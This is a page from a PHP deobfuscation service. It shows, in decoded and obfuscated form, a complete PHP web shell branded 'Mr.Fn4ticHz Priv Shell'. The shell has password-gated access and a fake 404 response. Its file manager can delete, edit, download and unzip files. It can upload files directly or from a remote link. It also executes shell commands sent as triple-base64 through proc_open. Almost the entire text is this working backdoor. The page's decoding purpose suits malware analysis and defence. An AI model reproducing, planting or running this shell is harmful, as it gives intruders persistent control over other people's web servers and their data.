Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto cb5YG; YHZQU: echo "\x20\46\156\142\x73\160\73\x7c\46\156\142\x73\x70\73\40\1..

Decoded Output download

<?php 
 goto cb5YG; YHZQU: echo " &nbsp;|&nbsp; WGET : "; goto ldDFm; meCrJ: echo "User : <font color='gold'>" . @get_current_user() . "&nbsp;</font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto TCt3B; CRQ2u: echo "<th>[ &nbsp;<a href="?path=" . $lokasi . "&upload=gaskan">Upload File</a>&nbsp; ]</th>"; goto g3k5T; g3k5T: echo "</table><br>"; goto LsxKH; buKHP: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto BkRrU; BkRrU: echo "</td></tr><tr><td>"; goto yorHi; gwiYP: @error_reporting(0); goto Aq6u5; tQnrH: function Login() { die("<!DOCTYPE HTML>\xa<html>
<title>\xa</title>\xa<br>
<form method='post'><input style='text-align:center;margin:0;margin-top:868px;background-color:#fff;border:1px solid #fff;' type='password' name='pass'></form>"); } goto IMRfC; qAmpS: function dunlut($file) { if (!is_readable($file)) { red("Cannot Download File / Unreadable File !"); die; } header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename="" . basename($file) . """); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . filesize($filepath)); flush(); readfile($file); die; } goto n3Vz3; VGBOg: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td>" . cekfile($lokasi . "/" . $file) . "<a href="?fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>\xa<td><center>" . $size . "</center></td>
<td><center>" . filedate($lokasi . "/" . $file) . "</center></td>\xa<td>" . owner($lokasi . "/" . $file) . "</td>
<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?pilihan&path={$lokasi}">
<select name="pilih">\xa<option value=""></option>\xa<option value="hapus">Delete</option>\xa<option value="dunlut">Download</option>
<option value="gantinama">Rename</option>\xa<option value="edit">Edit</option>"; if (class_exists("ZipArchive")) { echo "<option value="unzip">Unzip</option>"; } echo "</select>\xa<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">\xa<input type="hidden" name="path" value="{$lokasi}/{$file}">
<input type="submit" class="gas" value=">" />\xa</form></center></td>\xa</tr>"; } goto o_VxR; jxd93: if (file_exists("/usr/bin/perl")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto FyQ_e; XRrvQ: $lokasis = explode("/", $lokasi); goto vTTMe; FyQ_e: echo " &nbsp;|&nbsp; Python : "; goto BjRZS; cKckn: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "/" . $dir) || $dir == ".") { continue; } echo "<tr>\xa    <td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?path=" . $lokasi . "/" . $dir . "">" . $dir . "</a></td>
    <td><center>--</center></td>\xa    <td><center>" . filedate($lokasi . "/" . $dir) . "</center></td>\xa    <td>" . owner($lokasi . "/" . $dir) . "</td>
    <td><center>"; if (is_writable($lokasi . "/" . $dir)) { echo "<font color="green">"; } elseif (!is_readable($lokasi . "/" . $dir)) { echo "<font color="red">"; } echo statusnya($lokasi . "/" . $dir); if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa    <td><center><form method="POST" action="?pilihan&path={$lokasi}">\xa    <select name="pilih">\xa    <option value=""></option>
    <option value="hapus">Delete</option>\xa    <option value="gantinama">Rename</option>\xa    </select>\xa    <input type="hidden" name="type" value="dir">\xa    <input type="hidden" name="name" value="{$dir}">
    <input type="hidden" name="path" value="{$lokasi}/{$dir}">\xa    <input type="submit" class="gas" value=">" />
    </form></center></td>
    </tr>"; } goto yCq2C; HSXRH: function filedate($file) { return date("F d Y g:i:s", filemtime($file)); } goto sVPGH; yCq2C: echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>"; goto VGBOg; pNpWp: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto qAmpS; EtbIE: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto nd8IQ; BF49D: function statusnya($file) { $izin = substr(sprintf("%o", fileperms($file)), -4); return $izin; } goto pMTRG; BjRZS: if (file_exists("/usr/bin/python2")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto ImT0G; LsxKH: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File <i>" . basename($_POST["path"]) . "</i> Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
    New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />
    <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa    <input type="hidden" name="pilih" value="gantinama">
    <input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>\xa    </form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">\xa    <textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
    <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa    <input type="hidden" name="pilih" value="edit">\xa    <input type="submit" value="Edit File" name="gasedit" />\xa    </form><br>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "dunlut") { dunlut($_POST["path"]); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "unzip") { unzip($_POST["path"], $lokasi); } elseif ($_REQUEST["upload"] == "gaskan") { echo "<center>Upload File : "; echo "<form enctype="multipart/form-data" method="post">\xa<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]\xa<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]\xa<br>\xa<input type="hidden" name="upwkwk" value="aplod">\xa<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>\xaUpload File From Link :<br>\xa<input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa<br><br>403 Upload File<br>
<input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])"/>\xa<input type="hidden" name="bepasnama" id="namanya">\xa<textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>\xa<input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
</form><br><br></center>"; } elseif ($_GET["komend"] == "gaskan") { echo "<center>"; echo "<form method="post" onsubmit="document.getElementById('komendnya').value = btoa(btoa(btoa(document.getElementById('komendnya').value)))">
    " . @get_current_user() . "@" . ipserv() . ":~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">\xa    <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">
    </form><br>"; if (isset($_POST["eksekomend"])) { ekse($_POST["komend"], $lokasi); } echo "</center>"; } goto Bk0N6; N9YPv: author(); goto BF49D; AYKIq: echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\xa<tr class="first">\xa<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Last Modified</center></td>\xa<td><center>Owner</center></td>
<td><center>Permissions</center></td>\xa<td><center>Options</center></td>
</tr>"; goto cKckn; IMRfC: function VEsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto ueeLG; o_VxR: echo "</tr></td></table></table>"; goto N9YPv; SBmAI: $lokasi = str_replace("\", "/", $lokasi); goto XRrvQ; JF3zr: echo " &nbsp;|&nbsp; cURL : "; goto sdIcB; E1TvY: echo "MySQL : "; goto Yap8Y; U1usa: @set_time_limit(0); goto gwiYP; ZxXnd: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto SBmAI; Bk53R: echo "<th>[ &nbsp;<a href="?path=" . $lokasi . "&komend=gaskan">C0mmand</a>&nbsp; ]</th>"; goto CRQ2u; NYuaR: function author() { echo "<center><br>AnonSec - 2021</center>"; die; } goto EToKr; JGaJH: function ipserv() { if (empty($_SERVER["SERVER_ADDR"])) { return gethostbyname($_SERVER["SERVER_NAME"]); if (empty(gethostbyname($_SERVER["SERVER_NAME"]))) { return $_SERVER["SERVER_NAME"]; } } else { return $_SERVER["SERVER_ADDR"]; } } goto omm8j; n3Vz3: function owner($file) { if (function_exists("posix_getpwuid")) { $tod = @posix_getpwuid(fileowner($file)); return "<center>" . $tod["name"] . "</center>"; } else { return "<center>" . fileowner($file) . "</center>"; } } goto k2cWF; AUSDi: echo "Web Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto kMFHF; vTTMe: $lokasinya = @scandir($lokasi); goto USeK6; v1HDY: echo " &nbsp;|&nbsp; Perl : "; goto jxd93; EToKr: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto ZeZ3O; NYlz9: $disfunc = @ini_get("disable_functions"); goto dDAb5; omm8j: function cekfile($file) { return "<i class="fa fa-file" style="color: #d6d4ce"></i> "; } goto HSXRH; Bk0N6: if (!is_readable($lokasi)) { die("<center>This directory is unreadable :(</center>"); } goto AYKIq; mslau: echo "Server IP : <font color=gold>" . ipserv() . "</font> &nbsp;/&nbsp; Your IP : <font color=gold>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; goto AUSDi; vDWV5: echo "<th>[ &nbsp;<a href="" . $_SERVER["SCRIPT_NAME"] . "">Home</a>&nbsp; ]</th>"; goto Bk53R; Aq6u5: @http_response_code(404); goto NYlz9; ldDFm: if (file_exists("/usr/bin/wget")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto v1HDY; sVPGH: function unzip($file, $lokasi) { if (!is_readable($file)) { red("Cannot Unzip File / Unreadable File !"); die; } elseif (strpos(file_get_contents($file), "PK\3\x4") === false) { red("This isn't Zip File !"); die; } $zip = new ZipArchive(); $res = $zip->open($file); if ($res == true) { $zip->extractTo($lokasi); $zip->close(); green("Success Unzip File !"); } else { red("Failed to Unzip File !"); } } goto EtbIE; uVFpZ: echo "</table><br>"; goto CUJtY; EJnsN: function ekse($komend, $lokasi) { if (!function_exists("proc_open")) { die("proc_open function disabled !"); } elseif (!function_exists("base64_decode")) { die("base64_decode function disabled !"); } $komen = base64_decode(base64_decode(base64_decode($komend))); $tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes, $lokasi); echo "<textarea rows='25' cols='100'>" . htmlspecialchars(stream_get_contents($pipes[1])) . "</textarea><br><br>"; } goto JGaJH; nd8IQ: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto mslau; kMFHF: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto meCrJ; Yap8Y: if (function_exists("mysql_connect")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto JF3zr; USeK6: echo "<br>Directory (" . cekwrite($lokasi) . ") : &nbsp;"; goto buKHP; CUJtY: echo "<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">"; goto vDWV5; k2cWF: function cekwrite($lokasi) { $izin = substr(sprintf("%o", fileperms($lokasi)), -4); if (is_writable($lokasi)) { return "<font color=green>" . $izin . "</font>"; } else { return "<font color=red>" . $izin . "</font>"; } } goto EJnsN; ZeZ3O: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto pNpWp; dDAb5: if (empty($disfunc)) { $disf = "<font color='gold'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto NYuaR; g4KB2: echo "Disable Function : " . $disf . "</font><br>"; goto E1TvY; TCt3B: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto g4KB2; yorHi: if (isset($_POST["upwkwk"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } if (isset($_POST["berkasnya"])) { $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["bepas"])) { $bepasdata = $_POST["bepasdata"]; $bepasnama = $_POST["bepasnama"]; if ($bepasdata) { echo "string"; } @file_put_contents($lokasi . "/" . $bepasnama, $bepasdata); if (file_exists($lokasi . "/" . $bepasnama)) { echo "File Uploaded ! &nbsp;<font color='gold'><i>" . $lokasi . "/" . $bepasnama . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto uVFpZ; ueeLG: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { VEsetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { Login(); } } goto nGGIL; cb5YG: $auth_pass = "dee17887254531d33c03d810d3c9357c"; goto tQnrH; ImT0G: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto ZxXnd; sdIcB: if (function_exists("curl_init")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto YHZQU; nGGIL: ?> 
<!doctypehtml><html><head><title>Mr.Fn4ticHz Priv Shell</title><meta content="Mr.Fn4ticHz"name="author"><meta content="width=device-width,initial-scale=1"name="viewport"><meta content="Crushed Is Batter Than Fixing"name="description"><meta content="Crushed Is Batter Than Fixing"property="og:description"><meta content="https://bbx-host.pw/bbr.jpg"property="og:image"><meta content="noindex"name="robots"><meta content="noindex"name="googlebot"><meta content="#1f1f1f"name="theme-color"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href=""rel="stylesheet"type="text/css"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);body{font-family:Dosis,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#25383c}#content .first:hover{background-color:#25383c text-shadow:0px 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed;word-break:break-all}textarea{max-width:95%;max-height:100%;resize:none;outline:0;overflow:auto;background:0 0;color:#fff}textarea::-webkit-scrollbar{width:12px}textarea::-webkit-scrollbar-track{background:#1f1f1f}textarea::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}a{color:#fff;text-decoration:none}a:hover{color:gold;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><script>function setfilename(val) 
  { 
    filename = val.split('\\').pop().split('/').pop(); 
    //filename = filename.substring(0, filename.lastIndexOf('.')); 
    document.getElementById('namanya').value = filename; 
  } 
 
async function loadFile(file) { 
    let text = await file.text(); 
    document.getElementById("bepasdata").innerHTML = text; 
}</script><center><font face="Bungee"size="5">Mr.Fn4ticHz Priv Shell</font></center><table align="center"border="0"cellpadding="3"cellspacing="1"width="100%"><tr><td><?php  goto U1usa; pMTRG: ?>

Did this file decode correctly?

Original Code

<?php
 goto cb5YG; YHZQU: echo "\x20\46\156\142\x73\160\73\x7c\46\156\142\x73\x70\73\40\127\x47\x45\x54\x20\72\x20"; goto ldDFm; meCrJ: echo "\125\x73\x65\162\x20\x3a\40\74\146\x6f\156\x74\x20\143\157\x6c\x6f\x72\x3d\x27\147\157\154\x64\47\76" . @get_current_user() . "\x26\x6e\x62\163\160\x3b\x3c\57\146\157\x6e\164\76\50\x20\x3c\146\x6f\156\164\x20\143\x6f\154\x6f\x72\75\x27\x67\157\154\x64\x27\x3e" . @getmyuid() . "\x3c\57\146\x6f\156\x74\76\51\74\142\162\76"; goto TCt3B; CRQ2u: echo "\74\x74\150\76\x5b\40\46\x6e\x62\163\x70\73\74\141\40\150\162\x65\146\x3d\x22\77\160\141\x74\150\75" . $lokasi . "\46\x75\160\154\x6f\141\144\x3d\x67\141\163\153\141\156\x22\x3e\125\160\x6c\x6f\x61\144\x20\106\x69\x6c\145\74\57\x61\76\46\x6e\142\x73\x70\x3b\40\x5d\74\x2f\164\150\x3e"; goto g3k5T; g3k5T: echo "\x3c\57\164\141\x62\x6c\145\76\x3c\142\162\x3e"; goto LsxKH; buKHP: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "\74\141\40\150\x72\145\146\x3d\42\x3f\x70\x61\164\x68\75\57\x22\x3e\57\74\x2f\x61\x3e"; continue; } if ($lok == '') { continue; } echo "\x3c\x61\40\x68\x72\x65\146\x3d\42\x3f\x70\x61\164\150\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\42\x3e" . $lok . "\74\x2f\141\76\57"; } goto BkRrU; BkRrU: echo "\x3c\57\x74\x64\76\74\57\x74\x72\x3e\x3c\164\162\x3e\74\164\144\x3e"; goto yorHi; gwiYP: @error_reporting(0); goto Aq6u5; tQnrH: function Login() { die("\x3c\41\x44\117\x43\x54\x59\120\105\40\110\124\x4d\x4c\x3e\xa\74\x68\x74\155\x6c\76\12\x3c\164\x69\x74\154\145\76\xa\74\57\164\x69\x74\154\x65\76\xa\x3c\142\162\x3e\12\x3c\x66\157\162\x6d\40\x6d\145\x74\x68\x6f\144\75\47\x70\157\x73\x74\47\76\74\x69\x6e\x70\165\164\40\163\164\x79\154\145\75\x27\x74\x65\170\x74\x2d\141\x6c\x69\147\156\x3a\143\x65\x6e\x74\145\x72\73\155\141\162\x67\x69\156\x3a\60\73\x6d\141\162\x67\x69\156\55\164\157\x70\x3a\70\66\x38\160\x78\x3b\x62\141\143\x6b\x67\162\x6f\165\x6e\x64\55\x63\x6f\x6c\x6f\x72\x3a\x23\x66\x66\x66\73\x62\157\162\x64\x65\x72\x3a\x31\x70\170\x20\163\157\x6c\151\x64\x20\43\146\146\146\73\x27\40\x74\x79\160\145\x3d\47\x70\x61\163\x73\x77\x6f\162\144\x27\40\x6e\x61\x6d\145\75\x27\x70\141\x73\163\47\76\x3c\x2f\x66\x6f\x72\x6d\76"); } goto IMRfC; qAmpS: function dunlut($file) { if (!is_readable($file)) { red("\103\141\156\x6e\157\x74\40\x44\x6f\167\156\x6c\157\141\x64\x20\106\x69\x6c\145\40\x2f\40\125\x6e\162\145\141\144\x61\x62\154\145\x20\106\x69\154\x65\x20\41"); die; } header("\x43\x6f\x6e\x74\x65\x6e\164\55\104\x65\163\143\x72\x69\x70\164\151\157\x6e\x3a\x20\x46\151\x6c\x65\40\x54\x72\x61\x6e\163\146\145\162"); header("\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\141\x70\160\x6c\x69\x63\141\164\x69\157\156\x2f\x6f\x63\x74\x65\164\x2d\163\164\x72\x65\141\x6d"); header("\x43\157\156\164\x65\x6e\x74\55\104\x69\163\160\157\163\151\164\151\x6f\x6e\72\x20\141\164\x74\x61\x63\x68\x6d\145\x6e\164\x3b\40\x66\x69\x6c\145\156\141\155\x65\x3d\x22" . basename($file) . "\x22"); header("\105\170\160\x69\162\145\163\72\x20\x30"); header("\103\x61\x63\150\145\x2d\x43\x6f\x6e\x74\x72\x6f\154\72\40\x6d\165\163\x74\55\x72\145\x76\x61\x6c\151\x64\x61\x74\145"); header("\120\x72\141\x67\155\x61\72\x20\160\165\x62\154\x69\x63"); header("\103\157\156\x74\145\156\164\55\114\x65\x6e\147\x74\x68\x3a\40" . filesize($filepath)); flush(); readfile($file); die; } goto n3Vz3; VGBOg: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}\57{$file}")) { continue; } $size = filesize("{$lokasi}\x2f{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\x20\115\102"; } else { $size = $size . "\x20\113\x42"; } echo "\x3c\164\x72\x3e\12\74\164\144\76" . cekfile($lokasi . "\x2f" . $file) . "\x3c\x61\40\x68\x72\x65\146\x3d\x22\77\146\x69\x6c\145\154\x6f\143\x3d{$lokasi}\x2f{$file}\x26\x70\x61\164\150\75{$lokasi}\x22\76{$file}\x3c\57\141\x3e\x3c\57\x74\x64\76\xa\x3c\164\144\76\74\x63\x65\x6e\x74\x65\162\76" . $size . "\74\x2f\143\x65\x6e\x74\x65\162\x3e\x3c\x2f\x74\144\76\12\74\x74\x64\x3e\x3c\x63\145\156\164\x65\x72\x3e" . filedate($lokasi . "\57" . $file) . "\x3c\x2f\143\x65\x6e\x74\145\x72\x3e\x3c\x2f\164\144\76\xa\x3c\x74\x64\76" . owner($lokasi . "\57" . $file) . "\x3c\x2f\164\x64\76\12\74\x74\x64\76\x3c\x63\145\156\x74\145\162\76"; if (is_writable("{$lokasi}\57{$file}")) { echo "\74\x66\x6f\156\x74\x20\143\x6f\x6c\157\x72\x3d\42\x67\x72\145\145\x6e\x22\76"; } elseif (!is_readable("{$lokasi}\x2f{$file}")) { echo "\74\146\x6f\x6e\164\x20\143\157\x6c\x6f\162\75\42\162\145\x64\42\76"; } echo statusnya("{$lokasi}\x2f{$file}"); if (is_writable("{$lokasi}\x2f{$file}") || !is_readable("{$lokasi}\57{$file}")) { echo "\x3c\x2f\x66\157\156\164\x3e"; } echo "\74\57\x63\x65\x6e\164\145\162\x3e\74\x2f\164\x64\x3e\74\x74\x64\x3e\x3c\x63\145\x6e\164\x65\x72\76\12\74\146\157\162\x6d\40\155\145\164\x68\157\x64\75\x22\x70\157\x73\x74\42\40\141\x63\164\x69\x6f\156\75\42\x3f\x70\151\154\151\x68\x61\x6e\46\160\141\x74\x68\75{$lokasi}\x22\76\12\74\x73\x65\154\x65\143\x74\x20\156\141\x6d\x65\x3d\42\x70\x69\x6c\151\x68\42\x3e\xa\x3c\x6f\160\x74\x69\157\156\x20\x76\x61\x6c\x75\145\x3d\x22\x22\x3e\74\x2f\x6f\160\164\x69\157\156\76\xa\74\x6f\160\164\x69\157\x6e\x20\x76\x61\x6c\x75\145\75\42\x68\141\160\x75\x73\x22\x3e\x44\x65\154\145\x74\145\x3c\57\x6f\160\x74\x69\157\156\76\xa\x3c\x6f\x70\164\151\x6f\156\x20\x76\x61\x6c\x75\145\x3d\x22\144\165\156\x6c\x75\x74\x22\76\104\157\167\156\154\157\141\x64\x3c\57\157\160\164\x69\x6f\156\x3e\12\74\157\x70\164\x69\x6f\x6e\40\x76\141\x6c\x75\145\75\x22\x67\x61\x6e\x74\151\156\x61\x6d\141\x22\x3e\x52\x65\156\141\155\x65\x3c\57\x6f\160\164\x69\157\156\76\xa\74\157\x70\164\151\x6f\156\x20\x76\141\x6c\x75\x65\x3d\x22\x65\144\151\x74\x22\x3e\x45\144\151\164\x3c\57\x6f\160\x74\x69\x6f\156\x3e"; if (class_exists("\132\x69\160\x41\162\143\150\151\x76\x65")) { echo "\x3c\x6f\160\164\x69\x6f\156\40\166\141\x6c\x75\145\75\x22\x75\156\172\151\160\42\76\x55\x6e\172\x69\x70\74\x2f\x6f\x70\164\151\157\156\76"; } echo "\74\x2f\163\x65\x6c\145\x63\164\76\xa\x3c\x69\156\160\165\x74\x20\x74\171\x70\x65\x3d\x22\x68\151\x64\x64\x65\x6e\x22\x20\156\141\x6d\145\x3d\x22\x74\x79\160\145\42\x20\x76\141\154\x75\x65\x3d\x22\x66\x69\154\x65\x22\x3e\xa\x3c\x69\156\160\165\x74\x20\164\x79\x70\x65\75\x22\x68\x69\x64\x64\145\x6e\x22\40\156\141\155\x65\x3d\x22\156\141\x6d\x65\42\x20\x76\x61\154\165\x65\x3d\x22{$file}\x22\x3e\xa\74\x69\x6e\160\165\x74\40\164\171\160\x65\x3d\42\150\151\144\x64\145\x6e\42\x20\156\141\x6d\x65\x3d\x22\160\141\164\150\42\40\166\141\154\x75\145\x3d\x22{$lokasi}\57{$file}\x22\76\12\74\x69\x6e\x70\165\x74\x20\x74\171\x70\145\75\x22\163\165\142\x6d\x69\x74\x22\x20\143\154\x61\163\x73\x3d\x22\147\x61\x73\x22\40\x76\141\x6c\x75\145\75\42\x3e\x22\x20\x2f\76\xa\74\x2f\x66\x6f\162\155\76\x3c\x2f\143\x65\156\x74\x65\162\76\74\57\x74\144\x3e\xa\x3c\57\x74\162\x3e"; } goto o_VxR; jxd93: if (file_exists("\x2f\165\163\x72\x2f\142\151\156\x2f\160\145\162\154")) { echo "\x3c\x66\x6f\x6e\x74\40\x63\x6f\x6c\x6f\x72\x3d\147\x72\x65\x65\x6e\76\117\116\74\57\146\157\x6e\x74\76"; } else { echo "\x3c\x66\157\156\x74\40\x63\157\154\157\x72\75\162\145\144\x3e\117\106\106\74\57\x66\x6f\156\x74\76"; } goto FyQ_e; XRrvQ: $lokasis = explode("\57", $lokasi); goto vTTMe; FyQ_e: echo "\40\46\x6e\x62\x73\160\x3b\x7c\46\x6e\142\x73\160\73\x20\120\x79\164\x68\157\x6e\40\x3a\40"; goto BjRZS; cKckn: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "\x2f" . $dir) || $dir == "\56") { continue; } echo "\74\164\x72\x3e\xa\x20\x20\40\40\x3c\x74\144\x3e\x3c\x69\x20\143\154\x61\x73\163\x3d\47\x66\141\40\x66\x61\55\146\157\154\144\145\x72\x27\40\x73\164\x79\154\x65\x3d\47\x63\157\x6c\157\x72\x3a\40\x23\x66\146\x65\71\141\x32\x27\x3e\74\x2f\151\76\40\74\x61\40\x68\162\x65\x66\75\42\77\160\x61\164\150\75" . $lokasi . "\x2f" . $dir . "\42\x3e" . $dir . "\x3c\57\x61\76\x3c\57\164\x64\76\12\x20\x20\40\40\74\x74\x64\76\x3c\x63\145\x6e\x74\145\x72\76\x2d\x2d\x3c\57\143\145\x6e\x74\145\x72\x3e\74\57\164\x64\76\xa\40\40\40\x20\x3c\x74\144\76\x3c\x63\145\x6e\x74\x65\x72\76" . filedate($lokasi . "\x2f" . $dir) . "\74\x2f\143\x65\x6e\x74\x65\162\x3e\74\x2f\x74\x64\x3e\xa\x20\40\x20\40\74\164\x64\x3e" . owner($lokasi . 